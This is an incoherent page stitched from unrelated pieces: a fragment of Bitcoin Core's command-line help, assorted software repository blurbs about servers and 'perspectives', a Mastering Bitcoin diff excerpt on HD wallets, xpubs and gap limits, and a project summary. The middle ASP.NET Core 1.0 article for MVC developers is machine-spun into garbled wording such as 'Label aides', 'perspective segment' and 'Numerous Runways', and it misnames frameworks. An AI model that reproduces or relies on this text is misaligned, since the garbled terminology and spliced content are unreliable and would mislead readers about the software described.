maxuploadtarget limit), addr (responses to GETADDR avoid hitting the cache and contain random records with the most up-to-date info). Specify multiple permissions separated by commas (default: download,noban,mempool,relay). Can be specified multiple times. -whitelist=<[permissions@]IP address or network> Add permission flags to the peers connecting from the given IP address (e.g. 1.2.3.4) or CIDR-notated network (e.g. 1.2.3.0/24). Uses the same permissions as -whitebind. Can be specified multiple times. Wallet options: -addresstype What type of addresses to use ("legacy", "p2sh-segwit", or "bech32", default: "bech32") -avoidpartialspends Group outputs by address, selecting all or none, instead of selecting on a per-output basis. Privacy is improved as an address is only used once (unless someone sends to it after spending from it), but may result in slightly higher fees as suboptimal coin selection may result due to the added limitation (default: 0 (always enabled for wallets with "avoid_reuse" enabled)) -changetype What type of change to use ("legacy", "p2sh-segwit", or "bech32"). Default is same as -addresstype, except when -addresstype=p2sh-segwit a native segwit output is used when sending to a native segwit address) -disablewallet Do not load the wallet and disable wallet RPC calls -discardfee=<amt> The fee rate (in BTC/kB) that indicates your tolerance for discarding change by adding it to the fee (default: 0.0001). Note: An output is discarded if it is dust at this rate, but we will always discard up to the dust relay fee and a discard fee above that is limited by the fee estimate for the longest target -fallbackfee=<amt> A fee rate (in BTC/kB) that will be used when fee estimation has insufficient data. 0 to entirely disable the fallbackfee feature. (default: 0.00) -keypool=<n> Set key pool size to <n> (default: 1000). Warning: Smaller sizes may increase the risk of losing funds when restoring from an old backup, if none of the addresses in the original keypool have been used. -maxapsfee=<n> Spend up to this amount in additional (absolute) fees (in BTC) if it allows the use of partial spend avoidance (default: 0.00) -mintxfee=<amt> Fees (in BTC/kB) smaller than this are considered zero fee for transaction creation (default: 0.00001) -paytxfee=<amt> Fee (in BTC/kB) to add to transactions you send (default: 0.00) -rescan Rescan the block chain for missing wallet transactions on startup -spendzeroconfchange Spend unconfirmed change when sending transactions (default: 1) -txconfirmtarget=<n> If paytxfee is not set, include enough fee so transactions begin confirmation on average within n blocks (default: 6) -wallet=<path> Specify wallet path to load at startup. Can be used multiple times to load multiple wallets. Path is to a directory containing wallet data and log files. If the path is not absolute, it is interpreted relative to <walletdir>. This only loads existing wallets and does not create new ones. For backwards compatibility this also accepts names of existing top-level data files in <walletdir>. -walletbroadcast Make the wallet broadcast transactions (default: 1) -walletdir=<dir> Specify directory to hold wallets (default: <datadir>/wallets if it exists, otherwise <datadir>) -walletnotify=<cmd> Execute command when a wallet transaction changes. %s in cmd is replaced by TxID and %w is replaced by wallet name. %w is not currently implemented on windows. On systems where %w is supported, it should NOT be quoted because this would break shell escaping used to invoke the command. -walletrbf Send transactions with full-RBF opt-in enabled (RPC only, default: 0) ZeroMQ notification options: -zmqpubhashblock=<address> Enable publish hash block in <address> -zmqpubhashblockhwm=<n> Set publish hash block outbound message high water mark (default: 1000) -zmqpubhashtx=<address> Enable publish hash transaction in <address> -zmqpubhashtxhwm=<n> Set publish hash transaction outbound message high water mark (default: 1000) -zmqpubrawblock=<address> Enable publish raw block in <address> -zmqpubrawblockhwm=<n> Set publish raw block outbound message high water mark (default: 1000) -zmqpubrawtx=<address> Enable publish raw transaction in <address> -zmqpubrawtxhwm=<n> Set publish raw transaction outbound message high water mark (default: 1000) -zmqpubsequence=<address> Enable publish hash block and tx sequence in <address> -zmqpubsequencehwm=<n> Set publish hash sequence message high water mark (default: 1000) Debugging/Testing options: -debug=<category> Output debugging information (default: -nodebug, supplying <category> is optional). If <category> is not supplied or if <category> = 1, output all debugging information. <category> can be: net, tor, mempool, http, bench, zmq, walletdb, rpc, estimatefee, addrman, selectcoins, reindex, cmpctblock, rand, prune, proxy, mempoolrej, libevent, coindb, qt, leveldb, validation. -debugexclude=<category> Exclude debugging information for a category. Can be used in conjunction with -debug=1 to output debug logs for all categories except one or more specified categories. -help-debug Print help message with debugging options and exit -logips Include IP addresses in debug output (default: 0) -logthreadnames Prepend debug output with name of the originating thread (only available on platforms supporting thread_local) (default: 0) -logtimestamps Prepend debug output with timestamp (default: 1) -maxtxfee=<amt> Maximum total fees (in BTC) to use in a single wallet transaction; setting this too low may abort large transactions (default: 0.10) -printtoconsole Send trace/debug info to console (default: 1 when no -daemon. To disable logging to file, set -nodebuglogfile) -shrinkdebugfile Shrink debug.log file on client startup (default: 1 when no -debug) -uacomment=<cmt> Append comment to the user agent string Chain selection options: -chain=<chain> Use the chain <chain> (default: main). Allowed values: main, test, signet, regtest -signet Use the signet chain. Equivalent to -chain=signet. Note that the network is defined by the -signetchallenge parameter -signetchallenge Blocks must satisfy the given script to be considered valid (only for signet networks; defaults to the global default signet test network challenge) -signetseednode Specify a seed node for the signet network, in the hostname[:port] format, e.g. sig.net:1234 (may be used multiple times to specify multiple seed nodes; defaults to the global default signet test network seed node(s)) -testnet Use the test chain. Equivalent to -chain=test. Node relay options: -bytespersigop Equivalent bytes per sigop in transactions for relay and mining (default: 20) -datacarrier Relay and mine data carrier transactions (default: 1) -datacarriersize Maximum size of data in data carrier transactions we relay and mine (default: 83) -minrelaytxfee=<amt> Fees (in BTC/kB) smaller than this are considered zero fee for relaying, mining and transaction creation (default: 0.00001) -whitelistforcerelay Add 'forcerelay' permission to whitelisted inbound peers with default permissions. This will relay transactions even if the transactions were already in the mempool. (default: 0) -whitelistrelay Add 'relay' permission to whitelisted inbound peers with default permissions. This will accept relayed transactions even when not relaying transactions (default: 1) Block creation options: -blockmaxweight=<n> Set maximum BIP141 block weight (default: 3996000) -blockmintxfee=<amt> Set lowest fee rate (in BTC/kB) for transactions to be included in block creation. (default: 0.00001) RPC server options: -rest Accept public REST requests (default: 0) -rpcallowip=<ip> Allow JSON-RPC connections from specified source. Valid for <ip> are a single IP (e.g. 1.2.3.4), a network/netmask (e.g. 1.2.3.4/255.255.255.0) or a network/CIDR (e.g. 1.2.3.4/24). This option can be specified multiple times -rpcauth=<userpw> Username and HMAC-SHA-256 hashed password for JSON-RPC connections. The field <userpw> comes in the format: <USERNAME>:<SALT>$<HASH>. A canonical python script is included in share/rpcauth. The client then connects normally using the rpcuser=<USERNAME>/rpcpassword=<PASSWORD> pair of arguments. This option can be specified multiple times -rpcbind=<addr>[:port] Bind to given address to listen for JSON-RPC connections. Do not expose the RPC server to untrusted networks such as the public internet! This option is ignored unless -rpcallowip is also passed. Port is optional and overrides -rpcport. Use [host]:port notation for IPv6. This option can be specified multiple times (default: 127.0.0.1 and ::1 i.e., localhost) -rpccookiefile=<loc> Location of the auth cookie. Relative paths will be prefixed by a net-specific datadir location. (default: data dir) -rpcpassword=<pw> Password for JSON-RPC connections -rpcport=<port> Listen for JSON-RPC connections on <port> (default: 8332, testnet: 18332, signet: 38332, regtest: 18443) -rpcserialversion Sets the serialization of raw transaction or block hex returned in non-verbose mode, non-segwit(0) or segwit(1) (default: 1) -rpcthreads=<n> Set the number of threads to service RPC calls (default: 4) -rpcuser=<user> Username for JSON-RPC connections -rpcwhitelist=<whitelist> Set a whitelist to filter incoming RPC calls for a specific user. The field <whitelist> comes in the format: <USERNAME>:<rpc 1>,<rpc 2>,...,<rpc n>. If multiple whitelists are set for a given user, they are set-intersected. See -rpcwhitelistdefault documentation for information on default whitelist behavior. -rpcwhitelistdefault Sets default behavior for rpc whitelisting. Unless rpcwhitelistdefault is set to 0, if any -rpcwhitelist is set, the rpc server acts as if all rpc users are subject to empty-unless-otherwise-specified whitelists. If rpcwhitelistdefault is set to 1 and no -rpcwhitelist is set, rpc server acts as if all rpc users are subject to empty whitelists. -server Accept command line and JSON-RPC commands ~ $

Enhanced Grok Search MCP Server with comprehensive analysis capabilities - A robust MCP server providing web search, news search, and Twitter/X search through xAI's Grok API with rich analysis features including timelines, direct quotes, and multiple perspectives.

The F5 IPAM Controller runs in an orchestration environment like Kubernetes to allocate IP addresses from an IPAM system to BIG-IP Virtual Servers. The purpose is to abstract complexity related to setting up BIG-IP from a networking perspective

Production-grade MCP server for Wind/Wall/Door multi-perspective debate orchestration

Adversarial multi-perspective council MCP server for hermes-agent

An embedded HTTP server for iPhone or iPad which steams the view in 1 second intervals. This allows users to conduct presentations, or allows others to watch what you are doing on a screen. It is designed to allow teachers to view student activity, or to allow students to give presentations from their iPads. From a teacher perspective, it will allow teachers to view the activity of all students in a classroom, if this application is set as the default web-browser, and broadcasting is turned 'ON' by defaults. The second feature is the ability to filter student content at the application-level. This is a critical features as schools implement mobile devices which will be connected to non-filtered networks. Filtering is currently limiting Google and UTube searches to 'safe' content.

Twitter bot to provide broader perspective (Server)

An example of Perspective.rs hosted via an Axum server.

FOR MVC DEVLEOPERS THE FEAUTURES OF ASP.NET CORE ASP.NET Core 1.0 gives a patched up Web development system adapted towards the prerequisites of present day Web applications. The new structure, as of now in RC1, obliges you to learn numerous new ideas not found in ASP.NET MVC 5. To that end, this article identifies a couple of essential components that ASP.NET MVC 5 designers ought to know as they get ready to take in this new structure. 1. ASP.NET Core on Numerous Runways ASP.NET Core is a piece of .NET Core—another measured structure that backings numerous stages.ASP.NET and the .NET framework are focused on towards the Windows stage. Then again, ASP.NET Core is created to bolster various stages including Windows, Mac, and Linux. This additionally implies, dissimilar to ASP.NET web applications, basically, keep running under IIS, the ASP.NET Core applications can keep running under non-IIS Web servers. Figure 1 demonstrates the part of the .NET Core and ASP.NET Core. The part of the .NET Core and ASP.NET Core - A Web application worked with ASP.NET Core can target ASP.NET Framework 4.6 or the ASP.NET Core. The Web applications focusing on ASP.NET Framework 4.6 run just on the Windows stage. The Web applications focusing on the ASP.NET Core can keep running on Windows and non-Windows stages. Obviously, as on this composition, ASP.NET Core doesn't offer the same rich usefulness offered by ASP.NET Framework 4.6. 2. Part of Project.json ASP.NET Core utilizes an exceptional document—Project.json for putting away all the undertaking level configuration data. Project.config can store numerous design settings, for example, references to NuGet bundles utilized as a part of the task and target structures. "dependencies": { "Microsoft.AspNet.IISPlatformHandler": "1.0.0-rc1-final", "Microsoft.AspNet.Server.Kestrel": "1.0.0-rc1-final", "Microsoft.AspNet.Mvc": "6.0.0-rc1-final", "Microsoft.AspNet.Mvc.TagHelpers": "6.0.0-rc1-final", "Microsoft.AspNet.StaticFiles": "1.0.0-rc1-final", "Microsoft.AspNet.Tooling.Razor": "1.0.0-rc1-final", "Microsoft.Extensions.Configuration.Abstractions": "1.0.0-rc1-final", "Microsoft.Extensions.Configuration.Json": "1.0.0-rc1-final", "EntityFramework.MicrosoftSqlServer": "7.0.0-rc1-final", "EntityFramework.Commands": "7.0.0-rc1-final", "Microsoft.AspNet.Session": "1.0.0-rc1-final", "Newtonsoft.Json": "8.0.3" The Project.json record stores configuration data in JSON position. The above markup demonstrates a conditions segment that contains a rundown of NuGet bundles required by the application. For instance, the Web application under thought requires the 6.0.0-rc1-last form of Microsoft.AspNet.Mvc get together, etc 3. Part of AppSettings.json ASP.NET stores application configuration settings in Web.config. For instance, engineers utilize the <appSettings> area to store custom application settings, the <connectionStrings> segment to store database association strings, etc. ASP.NET Core utilizes AppSettings.json to store such bits of data. Consider the accompanying configuration: { "AppSettings": { "Title": "My ASP.NET Core Application" }, "Data": { "DefaultConnection": { "ConnectionString": "data source=.; initial catalog=Northwind;integrated security=true" } } } The previous JSON markup comprises of two properties or keys, to be specific AppSettings and Data. The AppSettings property holds a sub-key named Title. The Title sub-key has a string estimation of "My ASP.NET Core Application". Also, the Data key has a DefaultConnection sub-key. The DefaultConnection thusly has a ConnectionString sub-key. 4. Application set-up In ASP.NET, Global.asax goes about as the passage point for your application. You can wire different events handlers for occasions, for example, Application_Start and Session_Start, in the Global.asax record. In ASP.NET Core, the application startup happens in an unexpected way—it happens through a Startup class. one such Startup class - public class Startup { public Startup(IHostingEnvironment env, IApplicationEnvironment app) { ConfigurationBuilder builder = new ConfigurationBuilder(); builder.SetBasePath(app.ApplicationBasePath); builder.AddJsonFile("appsettings.json"); IConfigurationRoot config = builder.Build(); string str = config.Get<string> ("Data:DefaultConnection:ConnectionString"); // do something with str } public void ConfigureServices(IServiceCollection services) { services.AddMvc(); services.AddEntityFramework() .AddSqlServer(); } public void Configure(IApplicationBuilder app) { app.UseStaticFiles(); app.UseMvc(routes => { routes.MapRoute( name: "default", template: "{controller=Home}/ {action=Index}/{id?}"); }); } public static void Main(string[] args) => WebApplication.Run<Startup>(args); } The Startup class appeared above starts with a constructor. The constructor stacks the AppSettings.json record utilizing ConfigurationBuilder class. The Get() strategy then is utilized to peruse the database association string put away in the AppSettings.json document. The ConfigureServices() technique includes the administrations required by the application. For instance, here you add MVC and Entity Framework to the administrations gathering. The Configure() technique determines and arranges the administrations included before for application's utilization. For instance, the MVC directing is designed in the code appeared previously. 5. Tag Helpers In ASP.NET MVC 5, you utilized HTML assistants, for example, BeginForm(), LabelFor(), and TextBoxFor() to render structures and frame fields. You can keep on using HTML partners in ASP.NET Core, too. However, there is a superior option: Tag Helpers. Label aides take the type of standard HTML labels with certain extraordinary asp-* credits added to them. Consider the accompanying markup that renders a structure: <form asp-controller="Home" asp-action="Save" method="post"> <table border="1" cellpadding="10"> <tr> <td><label asp-for="FirstName">First Name :</label></td> <td><input type="text" asp-for="FirstName" /></td> </tr> <tr> <td><label asp-for="LastName">Last Name :</label></td> <td><input type="text" asp-for="LastName" /></td> </tr> <tr> <td><label asp-for="Email">Email :</label></td> <td><input type="text" asp-for="Email" /></td> </tr> <tr> <td><label asp-for="Phone">Phone :</label></td> <td><input type="text" asp-for="Phone" /></td> </tr> <tr> <td colspan="2"> <input type="submit" value="Submit" /> </td> </tr> </table> </form> Observe clearly, the properties that start with asp-. They are characterized by the label aides. For instance, the structure label aide utilizes asp-controller ascribe to indicate the objective controller name and asp-activity credit to determine the objective activity technique name. Correspondingly, asp-for traits utilized with name and info label partners tie a name or a text box to a model property. Label partners are more advantageous to use than HTML assistants in light of the fact that their linguistic structure nearly takes after the HTML markup. 6. View Components In MVC 5, you utilized halfway perspectives as a way to reuse markup and code. ASP.NET Core presents View Components, the more intense and adaptable option. A perspective part comprises of a class normally acquired from ViewComponent base class and a perspective record containing the required markup. This programming model is entirely like the one utilized by controllers and perspectives. It permits you to separate code and markup from each other—code in the perspective segment class and markup in a perspective. Once made, you can utilize a perspective segment on a perspective by utilizing the @Component.Invoke() technique. 7. Dependency Injection ASP.NET Core gives an inbuilt reliance infusion system. The DI system of ASP.NET Core offers four-lifetime modes for a sort being infused: Singleton: An object of an administration (the sort to be infused) is made and supplied to all the requests to that administration. Along these lines, fundamentally all requests get the same article to work with. Scoped: An object of an administration is made for every single request. In this way, every request gets another event of an administration to work with. Transient: An object of an administration is made each time an article is asked. Instance: For this situation, you are in charge of making an object of an administration. The DI system then uses that case in singleton mode said prior public void ConfigureServices(IServiceCollection services) { services.AddMvc(); services.AddSingleton<IMyService,MyService>(); } Here, MyService is the sort to be enlisted with the DI structure and actualizes IMyService. The AddSingleton() technique enlists this type for Singleton mode portrayed previously. Once a sort is enrolled with the DI system, you can infuse it in a controller like this: public class HomeController : Controller { private IMyService obj; public HomeController(IMyService obj) { this.obj = obj; } .... .... } 8. Gulp, Grunt, and Bower Support Gulp and Grunt are JavaScript assignment runners. They help you computerize generally required undertakings, for example, packaging JavaScript and CSS records, minifying JavaScript and CSS documents, and arranging Less and Sass records (and some more). They are introduced utilizing npm (Node Package Manager). The ASP.NET Core venture made utilizing Visual Studio 2015 permits you to include Grunt and Gulp arrangement documents furthermore gives Task Runner Explorer to screen the errands. Bower is a bundle administrator basically for front-end bundles. Front-end bundles are the bundles that you use in your Web pages, for example, JavaScript libraries/systems and CSS records. For instance, you may introduce jQuery in your ASP.NET Core venture by utilizing Bower. An ASP.NET Core venture made utilizing Visual Studio 2015 permits you to include a Bower setup document. You likewise can work with the bundles utilizing the Manage Bower Packages menu choice. 9. Single Programming for Web API Model for and MVC In MVC 5, controllers acquire from the System.Web.Mvc.Controller base class. What's more, Web API 2 controllers acquire from System.Web.Http.ApiController. In ASP.NET Core, both of these structures are converged into a solitary system. Therefore, under ASP.NET Core, an MVC controller and Web API controller both acquire from Microsoft.AspNet.Mvc.Controller base class. You then can design viewpoints, for example, HTTP verb mapping and the directing of the controllers as coveted. 10. Static Files and the wwwroot Folder In ASP.NET, there is no settled area for putting away static documents, for example, picture records, JavaScript documents, and CSS records (engineers regularly utilized a Content envelope to store such documents). In ASP.NET Core, all the static records are kept under the wwwroot envelope (default). You likewise can change the name of this envelope by utilizing the Project.json document. Refer the figure following down - After arrangement, the wwwroot turns into the Web application's root. Every one of the URLs to static records are determined as for this envelope. Along these lines,/pictures/logo.png anticipates that logo.png will be available under the wwwroot/pictures envelope. Conclusion - ASP.NET Core 1.0 is a redone system outfitted towards present day cloud based, measured Web applications. Despite the fact that the new structure safeguards the key ideas of MVC 5, ASP.NET engineers will discover numerous contrasts between MVC 5 and ASP.NET Core 1.0. This article specified the imperative new components/ideas that you have to comprehend to start your voyage with ASP.NET Core 1.0.

[TIP] ==== Many wallets do not allow for the creation of wallets with more than a 12 word mnemonic phrase. You will notice from the tables above that despite the unique lengths of entropy input, the seed size remains the same (512 bits). From a security perspective, the amount of entropy actually used for the production of HD wallets is roughly 128 bits, which equals 12 words. Providing more than 12 words produces additional entropy which is unnecessary, and this _unused_ entropy is not used for the derivation of the seed in the way that one might intially suspect. From a usability perspective, 12 words is also easier to write down, back up, and store. Many wallets do not allow for the creation of wallets with more than a 12 word mnemonic phrase. You will notice from the tables above that despite the unique lengths of entropy input, the seed size remains the same (512 bits). From a security perspective, the amount of entropy actually used for the production of HD wallets is roughly 128 bits, which equals 12 words. Providing more than 12 words produces additional entropy which is unnecessary, and this _unused_ entropy is not used for the derivation of the seed in the way that one might initially suspect. From a usability perspective, 12 words is also easier to write down, back up, and store. ==== [[mnemonic_passphrase]] @@ -478,7 +478,7 @@ However, the little web store became quite successful and attracted many orders Gabriel's HD wallet offers a much better solution through the ability to derive public child keys without knowing the private keys. Gabriel can load an extended public key (xpub) on his website, which can be used to derive a unique address for every customer order. Gabriel can spend the funds from his Trezor, but the xpub loaded on the website can only generate addresses and receive funds. This feature of HD wallets is a great security feature. Gabriel's website does not contain any private keys and therefore does not need high levels of security. To export the xpub, Gabriel uses the web-based software in conjunction with the Trezor hardware wallet. The Trezor device must be plugged in for the public keys to be exported. Note that hardware wallets will never export private keys&#x2014;those always remain on the device. <<export_xpub>> shows the web interface Gabriel uses to export the xpub. To export the xpub, Gabriel uses the Trezor Suite desktop app in conjunction with the Trezor hardware wallet. The Trezor device must be plugged in for the public keys to be exported. Note that hardware wallets will never export private keys&#x2014;those always remain on the device. <<export_xpub>> shows what Gabriel sees in Trezor Suite when exporting the xpub. [[export_xpub]] .Exporting an xpub from a Trezor hardware wallet image::images/mbc2_0512.png["Exporting the xpub from the Trezor"] Gabriel copies the xpub to his web store's bitcoin shop software. He uses _BTCPay Server_, which is an open source web-store for a variety of web hosting and content platforms. BTCPay Server uses the xpub to generate a unique address for every purchase. ((("", startref="gabrielfivetwo"))) ===== Account Discovery and Management Gabriel's business is flourishing. He has provided his extended public key (xpub) to _BTCPay Server_, which is generating unique addresses for customers to his website. Every time a customer to Gabriel's website clicks on the "Checkout" button with a specified payment modality (in this case, bitcoin), _BTCPay Server_ generates a new address for that customer. More specifically, _BTCPay Server_ iterates on the _address_index_ tree to create a new address to display to the customer, as defined by BIP-44. If the customer decides to switch payment methods or abandon the transaction entirely, this Bitcoin address goes unused and will not be used for another customer right away. At a single moment in time, Gabriel's website may have a large volume of outstanding addresses for customers making purchases, some of which may go unused and eventually expire. Once these addresses expire, _BTCPay Server_ will go back to reuse these addresses to fill the gap in _address_index_, but it becomes clear how there can be gaps between the _address_index_ leaves of the hierarchical deterministic tree where the money is actually located. Let's say that Gabriel is interested in viewing his total amount of bitcoin earned on a watch-only wallet (one that allows you to view transaction history, but not spend funds) that is separate from BTCPay Server but also conforms to the BIP-44 standard. How should this separate wallet go about searching for funds in this vast hierarchical tree, and when should it stop looking? Most wallets will typically follow an iterative process that utilizes a predefined limit, known as the _gap limit_. If, while searching for used addresses, the wallet doesn't find used addresses in a row beyond this limit number, it will stop searching the address chain. The default gap limit is typically set to 20. This is detailed in [[bip-44]]https://github.com/bitcoin/bips/blob/master/bip-0044.mediawiki[BIP-44]. [TIP] ==== Gap limits explain the phenomenon whereby the importing of a wallet may show an incorrect or zero balance. The funds are not lost, but rather, the wallet importing function has not traversed enough leaves to fully detect funds. Many wallets allow this default gap limit to be changed, and Gabriel may need to increase this limit to allow his wallet to fully import his transaction history.

A tiny web server based on the book “Computer Systems: A Programmer's Perspective(2nd)”

Test the functionality of the identity stick from the perspective of a server

REST API Performance. Test APIs from the perspective of both a Mobile phone and a Node server

Updated 15 seconds ago It is a hypothetical startup, where a user registers, sends free digital trees to people in their contacts and also paid supertrees,$1 each(the first supertree is free). A super can come to know and register for Send A Tree through source: google, invite_a_friend, paid promo, and article. A daily of the file is created for each day (filename: day_xx), containing event_type: registration, free_tree_send or super_tree_send, date, location, phone_type, birth_year, and source. In this project: I have set up Jupyter Notebook, PgAdmin, Rstudio, and Python3 on remote LINUX server, using DigitalOcean. Set up automation for data load, automated categorization based on event type and storing daily logs in respective folders, through CRONTAB Created SQL tables, for the categorized daily logs for REGISTRATIONS, FREE TREE SEND, and SUPER TREE SEND and automated SQL load. Performed broad market segmentation tasks through SQL and Python. Segments: Registrations, Free Trees, Super Trees 5.Performed micro-market segmentation tasks: Segments through SQL and Python: Location, phone type, Source, Birth Year Questions Answered: a. Which is the most important source of registrations? Are there any changes in the trends? b.Which Phone_type based segment has more/least registrants, the free tree sends, supertree sends? Who is more active? c.Which Location-based segment has more/least registrants, the free tree sends, supertree sends? Who is more active? d.Which Source-based segment has more/least registrants, the free tree sends, supertree sends? Who is more active? e.Which Birth Year-based segment has more/least registrants, the free tree sends, supertree sends? Who is more active? Calculate daily Active users on the app in total and through segmentation perspective. Automated the daily active users' calculations. Performed revenue calculation task in SQL and Python: Calculating the total revenue and also revenue through each segment possible and Automated the daily revenue calculation. Performed Funnel Analysis and Cohort Analysis( first and last 30 days) in SQL and Python. Performed Prediction Analysis to predict, Send-a-Tree possibly reaching the 25,000 free-tree sends per day, 10,000 super tree sends per day, 35,000 registrants per day? Perform Ramdon Forest Classification for classifying the error phone type records into iOS or Android-based on free_tree_sends, super_tree_sends, and source types as features. © 2020 GitHub, Inc.

A tool for exploring HTTP from both client and server perspectives

Tools for evaluating CSIP Aus server implementations from the perspective of a virtual client.

A C++ game server that streams player perspectives to dedicated client applications, and receives inputs back

MCP server for multi-perspective analysis and structured debates